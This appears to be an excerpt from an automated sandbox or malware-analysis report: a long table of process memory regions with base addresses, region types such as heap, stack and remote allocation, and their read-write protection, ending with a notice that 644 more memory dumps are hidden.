1BF4CE80000
|
heap
|
page read and write
|
||
|
1D673FE000
|
stack
|
page read and write
|
||
|
1D0752B0000
|
heap
|
page read and write
|
||
|
1185CCCC000
|
heap
|
page read and write
|
||
|
16FC4688000
|
heap
|
page read and write
|
||
|
1E80E113000
|
heap
|
page read and write
|
||
|
16FC9EF4000
|
heap
|
page read and write
|
||
|
1C91DCC0000
|
heap
|
page read and write
|
||
|
1185CB90000
|
heap
|
page read and write
|
||
|
16FC5AE3000
|
trusted library allocation
|
page read and write
|
||
|
16FC9F10000
|
heap
|
page read and write
|
||
|
18A96080000
|
heap
|
page read and write
|
||
|
1BF39AE4000
|
heap
|
page read and write
|
||
|
5025E7E000
|
stack
|
page read and write
|
||
|
16FC9F03000
|
heap
|
page read and write
|
||
|
1BF3A313000
|
heap
|
page read and write
|
||
|
16FC9B33000
|
trusted library allocation
|
page read and write
|
||
|
208D927A000
|
heap
|
page read and write
|
||
|
16FCA130000
|
trusted library allocation
|
page read and write
|
||
|
1BF3A3D3000
|
heap
|
page read and write
|
||
|
1D075160000
|
trusted library allocation
|
page read and write
|
||
|
1BF39AE8000
|
heap
|
page read and write
|
||
|
1BF39AD7000
|
heap
|
page read and write
|
||
|
215ED7AF000
|
heap
|
page read and write
|
||
|
16FC4F00000
|
heap
|
page read and write
|
||
|
16FC4699000
|
heap
|
page read and write
|
||
|
1E80E002000
|
heap
|
page read and write
|
||
|
1C91DBC0000
|
heap
|
page read and write
|
||
|
1185CC13000
|
heap
|
page read and write
|
||
|
1D075350000
|
heap
|
page read and write
|
||
|
1B81F7A0000
|
remote allocation
|
page read and write
|
||
|
1BF39A3C000
|
heap
|
page read and write
|
||
|
215EF5F1000
|
heap
|
page read and write
|
||
|
BDAE36B000
|
stack
|
page read and write
|
||
|
1BF3A392000
|
heap
|
page read and write
|
||
|
1B81F85C000
|
heap
|
page read and write
|
||
|
170407F000
|
stack
|
page read and write
|
||
|
BDAE3EE000
|
stack
|
page read and write
|
||
|
16FC9F1A000
|
heap
|
page read and write
|
||
|
16FC9DF0000
|
remote allocation
|
page read and write
|
||
|
1BF3A388000
|
heap
|
page read and write
|
||
|
18A96200000
|
heap
|
page read and write
|
||
|
1C91DA2F000
|
heap
|
page read and write
|
||
|
18A96202000
|
heap
|
page read and write
|
||
|
16FC4F9A000
|
heap
|
page read and write
|
||
|
1BF39A73000
|
heap
|
page read and write
|
||
|
1C91DA15000
|
heap
|
page read and write
|
||
|
1BF39A4A000
|
heap
|
page read and write
|
||
|
1BF3A388000
|
heap
|
page read and write
|
||
|
16FC9C97000
|
trusted library allocation
|
page read and write
|
||
|
16FC9DF0000
|
remote allocation
|
page read and write
|
||
|
18A9622A000
|
heap
|
page read and write
|
||
|
1CB34FF000
|
stack
|
page read and write
|
||
|
19B98902000
|
heap
|
page read and write
|
||
|
16FC9F02000
|
heap
|
page read and write
|
||
|
46BC17E000
|
stack
|
page read and write
|
||
|
208D9213000
|
heap
|
page read and write
|
||
|
215ED730000
|
heap
|
page read and write
|
||
|
208D9A02000
|
trusted library allocation
|
page read and write
|
||
|
16FC9EEA000
|
heap
|
page read and write
|
||
|
1E80DE90000
|
heap
|
page read and write
|
||
|
9AB12FE000
|
stack
|
page read and write
|
||
|
215EF0A4000
|
heap
|
page read and write
|
||
|
16FC9F09000
|
heap
|
page read and write
|
||
|
46247C000
|
stack
|
page read and write
|
||
|
1BF3A389000
|
heap
|
page read and write
|
||
|
A0ACDFD000
|
stack
|
page read and write
|
||
|
215EF700000
|
heap
|
page read and write
|
||
|
1C757402000
|
heap
|
page read and write
|
||
|
1BF3A820000
|
heap
|
page read and write
|
||
|
1185CC00000
|
heap
|
page read and write
|
||
|
19B9884D000
|
heap
|
page read and write
|
||
|
A0AD2FE000
|
stack
|
page read and write
|
||
|
215ED834000
|
heap
|
page read and write
|
||
|
1703D7F000
|
stack
|
page read and write
|
||
|
1BF3A381000
|
heap
|
page read and write
|
||
|
1BF3A38B000
|
heap
|
page read and write
|
||
|
1D07539D000
|
heap
|
page read and write
|
||
|
16FC9E3B000
|
heap
|
page read and write
|
||
|
1BF3A37A000
|
heap
|
page read and write
|
||
|
208D923F000
|
heap
|
page read and write
|
||
|
46BC9FA000
|
stack
|
page read and write
|
||
|
1C757508000
|
heap
|
page read and write
|
||
|
BDAEB78000
|
stack
|
page read and write
|
||
|
1185CB20000
|
heap
|
page read and write
|
||
|
1BF39A82000
|
heap
|
page read and write
|
||
|
16FC46AA000
|
heap
|
page read and write
|
||
|
16FC4F9B000
|
heap
|
page read and write
|
||
|
1C91DA1E000
|
heap
|
page read and write
|
||
|
1C757400000
|
heap
|
page read and write
|
||
|
3EE8FE000
|
stack
|
page read and write
|
||
|
75D19FF000
|
stack
|
page read and write
|
||
|
16FC9DC0000
|
trusted library allocation
|
page read and write
|
||
|
1C91DA1E000
|
heap
|
page read and write
|
||
|
18A961D0000
|
remote allocation
|
page read and write
|
||
|
19B98846000
|
heap
|
page read and write
|
||
|
1BF39A6D000
|
heap
|
page read and write
|
||
|
1C91DA06000
|
heap
|
page read and write
|
||
|
1BF3A802000
|
heap
|
page read and write
|
||
|
1C75742A000
|
heap
|
page read and write
|
||
|
16FC9E00000
|
heap
|
page read and write
|
||
|
1BF39A69000
|
heap
|
page read and write
|
||
|
1BF3A381000
|
heap
|
page read and write
|
||
|
1BF3A37B000
|
heap
|
page read and write
|
||
|
4621FB000
|
stack
|
page read and write
|
||
|
19B9886C000
|
heap
|
page read and write
|
||
|
1703BFC000
|
stack
|
page read and write
|
||
|
3514CFC000
|
stack
|
page read and write
|
||
|
75D14FB000
|
stack
|
page read and write
|
||
|
1C91DA1E000
|
heap
|
page read and write
|
||
|
215ED7A3000
|
heap
|
page read and write
|
||
|
19B98832000
|
heap
|
page read and write
|
||
|
215ED880000
|
heap
|
page read and write
|
||
|
1BF39940000
|
trusted library allocation
|
page read and write
|
||
|
16FC9E61000
|
heap
|
page read and write
|
||
|
1BF39B13000
|
heap
|
page read and write
|
||
|
1BF3A3AB000
|
heap
|
page read and write
|
||
|
1C91DA12000
|
heap
|
page read and write
|
||
|
1BF3A32D000
|
heap
|
page read and write
|
||
|
1BF39A60000
|
heap
|
page read and write
|
||
|
18A96180000
|
trusted library allocation
|
page read and write
|
||
|
208D90A0000
|
heap
|
page read and write
|
||
|
1BF39A5F000
|
heap
|
page read and write
|
||
|
46237B000
|
stack
|
page read and write
|
||
|
46BC87E000
|
stack
|
page read and write
|
||
|
1D075595000
|
heap
|
page read and write
|
||
|
208D91A0000
|
trusted library allocation
|
page read and write
|
There are 644 hidden memdumps, click here to show them.